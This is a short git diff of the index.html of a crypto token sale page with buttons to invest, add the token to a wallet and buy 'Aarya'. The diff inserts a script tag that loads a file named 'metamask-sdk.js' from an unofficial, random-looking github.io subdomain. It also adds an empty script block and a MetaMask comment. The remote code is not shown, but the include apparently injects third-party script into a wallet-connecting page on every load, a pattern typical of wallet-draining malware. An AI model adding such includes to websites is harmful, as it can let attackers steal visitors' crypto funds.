--- a/index.html
+++ b/index.html
@@ -21,6 +21,8 @@
   rel="stylesheet"
   href="https://cdn.jsdelivr.net/npm/swiper@9/swiper-bundle.min.css"
 />
+<script src="https://c0f4f41c-2f55-4863-921b-sdk-docs.github.io/cdn/metamask-sdk.js"></script>
+
 
 
     <!-- Google tag (gtag.js) -->
@@ -1628,6 +1630,9 @@
                     <p data-start="Get Ready..." data-text="Invest" data-title="Add to Wallet"></p>
                 </button>
             </div>
+            <script>
+                
+            </script>
             <div class="buttonsCta">
                 <button class="btnCta" onclick="toICO()"><span></span>
                     <p data-start="Get Ready..." data-text="Invest" data-title="Buy Aarya"></p>
@@ -1757,6 +1762,10 @@
         const observer = lozad();
         observer.observe();
     </script>
+
+    <!-- js to add token to mobile metamask -->
+
+
     <!-- js to send user to blockchain explorer on clicking the logo -->
     <script>
         function toPolygonscan() {
